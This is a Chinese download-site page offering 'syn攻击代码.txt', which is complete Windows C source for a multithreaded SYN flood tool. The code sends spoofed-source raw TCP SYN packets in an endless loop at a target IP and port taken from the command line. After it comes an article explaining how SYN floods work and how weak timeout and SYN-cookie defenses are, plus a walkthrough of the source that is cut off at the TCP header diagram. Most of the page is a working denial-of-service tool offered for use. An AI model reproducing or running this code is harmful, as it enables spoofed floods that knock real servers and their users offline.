⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 syn攻击代码.txt

📁 目前的DDOS拒绝服务攻击大多都是SYN攻击
💻 TXT
📖 第 1 页 / 共 3 页
字号:
#include <winsock2.h>
#include <Ws2tcpip.h> 
#include <stdio.h>

#pragma comment(lib,"ws2_32.lib")
#define SEQ 0x28376839

int threadnum,maxthread,port;
char *DestIP;//目标IP

void display(void)  // 定义状态提示函数 
{ 
       static int play=0;
// 进度条 
char *plays[12]= 
{ 
" | ", 
 " / ", 
 " - ", 
 " \\ ",
 " | ", 
 " / ", 
 " - ", 
 " \\ ", 
 " | ", 
 " / ", 
 " - ", 
 " \\ ", 
}; 

printf("=%s= %d threads \r", plays[play],threadnum);
play=(play==11)?0:play+1;
} 

//定义一个tcphdr结构来存放TCP首部
typedef struct tcphdr
{
       USHORT th_sport;//16位源端口号
       USHORT th_dport;//16位目的端口号
       unsigned int th_seq;//32位序列号
       unsigned int th_ack;//32位确认号
       unsigned char th_lenres;//4位首部长度+6位保留字中的4位
       unsigned char th_flag;////6位标志位
       USHORT th_win;//16位窗口大小
       USHORT th_sum;//16位效验和
       USHORT th_urp;//16位紧急数据偏移量
}TCP_HEADER; 

//定义一个iphdr来存放IP首部
typedef struct iphdr//ip首部
{
        unsigned char h_verlen;//4位手部长度,和4位IP版本号
        unsigned char tos;//8位类型服务
        unsigned short total_len;//16位总长度
        unsigned short ident;//16位标志
        unsigned short frag_and_flags;//3位标志位(如SYN,ACK,等等)
        unsigned char ttl;//8位生存时间
        unsigned char proto;//8位协议
        unsigned short checksum;//ip手部效验和
        unsigned int sourceIP;//伪造IP地址
        unsigned int destIP;//攻击的ip地址
}IP_HEADER;

//TCP伪首部,用于进行TCP效验和的计算,保证TCP效验的有效性
struct
{
       unsigned long saddr;//源地址
       unsigned long daddr;//目的地址
       char mbz;//置空
       char ptcl;//协议类型
       unsigned short tcpl;//TCP长度
}PSD_HEADER; 

//计算效验和函数,先把IP首部的效验和字段设为0(IP_HEADER.checksum=0)
//然后计算整个IP首部的二进制反码的和。
USHORT checksum(USHORT *buffer, int size)
{
       unsigned long cksum=0;
       while(size >1) {
              cksum+=*buffer++;
              size-=sizeof(USHORT);
       }
       if(size) cksum+=*(UCHAR*)buffer;
       cksum=(cksum >> 16)+(cksum&0xffff);
       cksum+=(cksum >>16);
       return (USHORT)(~cksum); 
}

DWORD WINAPI SynfloodThread(LPVOID lp)//synflood线程函数
{

SOCKET  sock =NULL;
int ErrorCode=0,flag=true,TimeOut=2000,FakeIpNet,FakeIpHost,dataSize=0,SendSEQ=0;
struct sockaddr_in sockAddr;
TCP_HEADER  tcpheader;
IP_HEADER   ipheader;
char        sendBuf[128];

       sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
       if(sock==INVALID_SOCKET)
       {
              printf("Socket failed: %d\n",WSAGetLastError());
       return 0;
       }

       //设置IP_HDRINCL以便自己填充IP首部
       ErrorCode=setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
       if(ErrorCode==SOCKET_ERROR)
       {
               printf("Set sockopt failed: %d\n",WSAGetLastError());
       return 0;
       }
       //设置发送超时
       ErrorCode=setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));
       if(ErrorCode==SOCKET_ERROR)
       {
               printf("Set sockopt time out failed: %d\n",WSAGetLastError());
       return 0;
       }
    //设置目标地址
       memset(&sockAddr,0,sizeof(sockAddr));
       sockAddr.sin_family=AF_INET;
       sockAddr.sin_addr.s_addr =inet_addr(DestIP);
       FakeIpNet=inet_addr(DestIP);
       FakeIpHost=ntohl(FakeIpNet);
    //填充IP首部
       ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
       ipheader.total_len = htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
       ipheader.ident = 1;
       ipheader.frag_and_flags = 0;
       ipheader.ttl = 128;
       ipheader.proto = IPPROTO_TCP;
       ipheader.checksum =0;
       ipheader.sourceIP = htonl(FakeIpHost+SendSEQ);
       ipheader.destIP = inet_addr(DestIP);
    //填充TCP首部
       tcpheader.th_dport=htons(port);
       tcpheader.th_sport = htons(8080);
       tcpheader.th_seq = htonl(SEQ+SendSEQ);
       tcpheader.th_ack = 0;
       tcpheader.th_lenres =(sizeof(TCP_HEADER)/4<<4|0);
       tcpheader.th_flag = 2;
       tcpheader.th_win = htons(16384);
       tcpheader.th_urp = 0;
       tcpheader.th_sum = 0;

       PSD_HEADER.saddr=ipheader.sourceIP;
       PSD_HEADER.daddr=ipheader.destIP;
       PSD_HEADER.mbz=0; 
       PSD_HEADER.ptcl=IPPROTO_TCP;
       PSD_HEADER.tcpl=htons(sizeof(tcpheader));

       for(;;)
       {
              
              SendSEQ=(SendSEQ==65536)?1:SendSEQ+1;
              ipheader.checksum =0;
              ipheader.sourceIP = htonl(FakeIpHost+SendSEQ);
              tcpheader.th_seq = htonl(SEQ+SendSEQ);
              tcpheader.th_sport = htons(SendSEQ);
              tcpheader.th_sum = 0;
              PSD_HEADER.saddr=ipheader.sourceIP;
              //把TCP伪首部和TCP首部复制到同一缓冲区并计算TCP效验和
              memcpy(sendBuf,&PSD_HEADER,sizeof(PSD_HEADER));
              memcpy(sendBuf+sizeof(PSD_HEADER),&tcpheader,sizeof(tcpheader));
              tcpheader.th_sum=checksum((USHORT *)sendBuf,sizeof(PSD_HEADER)+sizeof(tcpheader));

              memcpy(sendBuf,&ipheader,sizeof(ipheader));
              memcpy(sendBuf+sizeof(ipheader),&tcpheader,sizeof(tcpheader));
              memset(sendBuf+sizeof(ipheader)+sizeof(tcpheader),0,4);
              dataSize=sizeof(ipheader)+sizeof(tcpheader);
              ipheader.checksum=checksum((USHORT *)sendBuf,dataSize);
              memcpy(sendBuf,&ipheader,sizeof(ipheader));

              sendto(sock,sendBuf,dataSize,0,(struct sockaddr*) &sockAddr,sizeof(sockAddr));
           display();
   
       
       }//end for
    Sleep(20);
    InterlockedExchangeAdd((long *)&threadnum,-1);

       return 0;
}

void usage(char *name)
{
printf("\t===================SYN Flood======================\n");
printf("\t==========gxisone@hotmail.com     2004/7/6========\n");
printf("\tusage: %s [dest_IP] [port] [thread]\n",name);
printf("\tExample: %s 192.168.1.1 80 100\n",name);
}

int main(int argc,char* argv[])
{
    
       if(argc!=4)
       {
       
              usage(argv[0]);
              return 0;
       }
       usage(argv[1]);

       int ErrorCode=0;
       DestIP=argv[1];//取得目标主机IP
       port=atoi(argv[2]);//取得目标端口号
       maxthread=(maxthread>100)?100:atoi(argv[3]);
       //如果线程数大于100则把线程数设置为100

       WSADATA wsaData;

       if((ErrorCode=WSAStartup(MAKEWORD(2,2),&wsaData))!=0){
               printf("WSAStartup failed: %d\n",ErrorCode); 
               return 0;
       }

 

       printf("[start]...........\nPress any key to stop!\n");

       while(threadnum<maxthread)//循环创建线程
       {
    if(CreateThread(NULL,0,SynfloodThread,0,0,0))
       {
              Sleep(10);
           threadnum++;
       }
       }
       WSACleanup();
       printf("\n[Stopd]...........\n");
       
       return 0;
}

第一部分 SYN Flood的基本原理 

SYN Flood是当前最流行的DoS(拒绝服务攻击)与DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。



要明白这种攻击的基本原理,还是要从TCP连接建立的过程开始说起:

大家都知道,TCP与UDP不同,它是基于连接的,也就是说:为了在服务端和客户端之间传送TCP数据,必须先建立一个虚拟电路,也就是TCP连接,建立TCP连接的标准过程是这样的:

首先,请求端(客户端)发送一个包含SYN标志的TCP报文,SYN即同步(Synchronize),同步报文会指明客户端使用的端口以及TCP连接的初始序号; 

第二步,服务器在收到客户端的SYN报文后,将返回一个SYN+ACK的报文,表示客户端的请求被接受,同时TCP序号被加一,ACK即确认(Acknowledgement)。 

第三步,客户端也返回一个确认报文ACK给服务器端,同样TCP序列号被加一,到此一个TCP连接完成。 

以上的连接过程在TCP协议中被称为三次握手(Three-way Handshake)。 



问题就出在TCP连接的三次握手中,假设一个用户向服务器发送了SYN报文后突然死机或掉线,那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手无法完成),这种情况下服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接,这段时间的长度我们称为SYN Timeout,一般来说这个时间是分钟的数量级(大约为30秒-2分钟);一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题,但如果有一个恶意的攻击者大量模拟这种情况,服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源----数以万计的半连接,即使是简单的保存并遍历也会消耗非常多的CPU时间和内存,何况还要不断对这个列表中的IP进行SYN+ACK的重试。实际上如果服务器的TCP/IP栈不够强大,最后的结果往往是堆栈溢出崩溃---即使服务器端的系统足够强大,服务器端也将忙于处理攻击者伪造的TCP连接请求而无暇理睬客户的正常请求(毕竟客户端的正常请求比率非常之小),此时从正常客户的角度看来,服务器失去响应,这种情况我们称作:服务器端受到了SYN Flood攻击(SYN洪水攻击)。 



从防御角度来说,有几种简单的解决方法,第一种是缩短SYN Timeout时间,由于SYN Flood攻击的效果取决于服务器上保持的SYN半连接数,这个值=SYN攻击的频度 x SYN Timeout,所以通过缩短从接收到SYN报文到确定这个报文无效并丢弃改连接的时间,例如设置为20秒以下(过低的SYN Timeout设置可能会影响客户的正常访问),可以成倍的降低服务器的负荷。

第二种方法是设置SYN Cookie,就是给每一个请求连接的IP地址分配一个Cookie,如果短时间内连续受到某个IP的重复SYN报文,就认定是受到了攻击,以后从这个IP地址来的包会被一概丢弃。

可是上述的两种方法只能对付比较原始的SYN Flood攻击,缩短SYN Timeout时间仅在对方攻击频度不高的情况下生效,SYN Cookie更依赖于对方使用真实的IP地址,如果攻击者以数万/秒的速度发送SYN报文,同时利用SOCK_RAW随机改写IP报文中的源地址,以上的方法将毫无用武之地。

















第二部份 SYN Flooder源码解读 



下面我们来分析SYN Flooder的程序实现。

首先,我们来看一下TCP报文的格式:



0 1 2 3 4 5 6

0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| IP首部 | TCP首部 | TCP数据段   |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

图一 TCP报文结构 



如上图所示,一个TCP报文由三个部分构成:20字节的IP首部、20字节的TCP首部与不定长的数据段,(实际操作时可能会有可选的IP选项,这种情况下TCP首部向后顺延)由于我们只是发送一个SYN信号,并不传递任何数据,所以TCP数据段为空。TCP首部的数据结构为:



0 1 2 3 

0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| 十六位源端口号 | 十六位目标端口号 |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| 三十二位序列号 |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| 三十二位确认号 |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| 四位 | |U|A|P|R|S|F| |

| 首部 |六位保留位 |R|C|S|S|Y|I| 十六位窗口大小 |

| 长度 | |G|K|H|T|N|N| |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -